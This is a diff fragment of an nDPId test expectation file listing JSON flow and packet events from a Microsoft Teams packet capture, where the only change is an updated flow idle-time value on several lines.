00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2196,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687370,"flow_last_seen":1587041687370,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041687370,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -316,25 +316,25 @@ 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2198,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041687382,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00733{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1587041687435,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1587041687435,"pkt":"KDc3AG3IEBMx8Tl2CABFAAD6rblAADkRD+LAqAEBwKgBBgA10zUA5gAAcASBgAABAAYAAAAAA2FwaQ9taWNyb3NvZnRzdHJlYW0DY29tAAABAAHADAAFAAEAAAe+AB8DYXBpBnN0cmVhbQ50cmFmZmljbWFuYWdlcgNuZXQAwDUABQABAAAAPAAJBmV1d2UtMcAMwGAABQABAAAEVQANCmV1d2UtMS1hcGnAQMB1AAUAAQAAACkACwhldXdlLTEtMcAMwI4ABQABAAAAwQApHWFtcy1ldXdlLTEtaG9zLWFwaWdhdGV3YXktMS0xCGNsb3VkYXBwwE\/ApQABAAEAAAANAARoKLuX"} 00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2201,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1587041687435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"api.microsoftstream.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.40.187.151"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687436,"flow_last_seen":1587041687436,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687436,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1587041687436,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687436,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVUrAqAEGaCi7l+ySAbtvi5oIAAAAALAC\/\/9njAAAAgQFtAEDAwUBAQgKMITBnAAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2203,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1587041687466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687466,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8OsBAAGwG7o1oKLuXwKgBBgG77JKBluUGb4uaCaASIADVGwAAAgQFoAEDAwgEAggKAbkbHzCEwZw="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2204,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1587041687466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687466,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVVbAqAEGaCi7l+ySAbtvi5oJgZblB4AQEAkTrwAAAQEICjCEwbkBuRsf"} -00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2205,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687436,"flow_last_seen":1587041687466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041687466,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2226,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041687245,"flow_last_seen":1587041687544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1587041687544,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687436,"flow_last_seen":1587041687436,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687436,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2202,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1587041687436,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687436,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVUrAqAEGaCi7l+ySAbtvi5oIAAAAALAC\/\/9njAAAAgQFtAEDAwUBAQgKMITBnAAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2203,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1587041687466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687466,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8OsBAAGwG7o1oKLuXwKgBBgG77JKBluUGb4uaCaASIADVGwAAAgQFoAEDAwgEAggKAbkbHzCEwZw="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2204,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1587041687466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687466,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVVbAqAEGaCi7l+ySAbtvi5oJgZblB4AQEAkTrwAAAQEICjCEwbkBuRsf"} +00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2205,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687436,"flow_last_seen":1587041687466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041687466,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2226,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041687245,"flow_last_seen":1587041687544,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1587041687544,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2238,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041687611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2238,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041687600,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2258,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041687725,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2258,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041687725,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1587041687731,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1587041687731,"pkt":"EBMx8Tl2KDc3AG3ICABFAABM83AAAP8RRNjAqAEGwKgBAfUPADUAOAAFY+UBAAABAAAAAAAABmV1bm8tMQNhcGkPbWljcm9zb2Z0c3RyZWFtA2NvbQAAAQAB"} 00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"euno-1.api.microsoftstream.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2260,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1587041687745,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1587041687745,"pkt":"KDc3AG3IEBMx8Tl2CABFAADTPBBAADkRgbLAqAEBwKgBBgA19Q8AvwAAY+WBgAABAAQAAAAABmV1bm8tMQNhcGkPbWljcm9zb2Z0c3RyZWFtA2NvbQAAAQABwAwABQABAAAGxQAfCmV1bm8tMS1hcGkOdHJhZmZpY21hbmFnZXIDbmV0AMA8AAUAAQAAABUACwhldW5vLTEtMcATwGcABQABAAAAOgApHWFtcy1ldW5vLTEtaG9zLWFwaWdhdGV3YXktMS0xCGNsb3VkYXBwwFbAfgABAAEAAAAVAAQ0qbp3"} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2260,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"euno-1.api.microsoftstream.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.169.186.119"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2261,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687745,"flow_last_seen":1587041687745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2261,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1587041687745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687745,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGienAqAEGNKm6d+yTAbth0wzHAAAAALAC\/\/81+QAAAgQFtAEDAwUBAQgKMITCxwAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2265,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687789,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GLFAAGwGRTw0qbp3wKgBBgG77JMQ1B2QYdMMyKASIACACgAAAgQFoAEDAwgEAggKASJ3bTCEwsc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2266,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGifXAqAEGNKm6d+yTAbth0wzIENQdkYAQEAm+kQAAAQEICjCEwvABIndt"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2267,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687745,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041687789,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euno-1.api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2261,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687745,"flow_last_seen":1587041687745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2261,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1587041687745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687745,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGienAqAEGNKm6d+yTAbth0wzHAAAAALAC\/\/81+QAAAgQFtAEDAwUBAQgKMITCxwAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2265,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1587041687789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687789,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GLFAAGwGRTw0qbp3wKgBBgG77JMQ1B2QYdMMyKASIACACgAAAgQFoAEDAwgEAggKASJ3bTCEwsc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2266,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1587041687789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGifXAqAEGNKm6d+yTAbth0wzIENQdkYAQEAm+kQAAAQEICjCEwvABIndt"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2267,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687745,"flow_last_seen":1587041687789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041687789,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euno-1.api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2311,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041688611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2311,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041688190,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2313,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041689410} @@ -348,39 +348,39 @@ 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00784{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2318,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1587041690915,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":301,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":301,"pkt_l4_len":267,"thread_ts_msec":1587041690915,"pkt":"KDc3AG3IEBMx8Tl2CABFAAEfVLxAADkRaLrAqAEBwKgBBgA1+boBCwAAeGqBgAABAAUAAAAAAmRjE2FwcGxpY2F0aW9uaW5zaWdodHMJbWljcm9zb2Z0A2NvbQAAAQABwAwABQABAAAACgAuHWFwcGxpY2F0aW9uaW5zaWdodHNfaW5nZXN0aW9uB21vbml0b3IFYXp1cmXALcBCAAUAAQAAAJEALB1hcHBsaWNhdGlvbmluc2lnaHRzX2luZ2VzdGlvbgtwcml2YXRlbGlua8BgwHwABQABAAAAXwAXAmRjDnRyYWZmaWNtYW5hZ2VyA25ldADAtAAFAAEAAAAeABwQY2ZyLWJyZWV6aWVzdC1pbghjbG91ZGFwcMDGwNcAAQABAAAABwAEKE+KKQ=="} 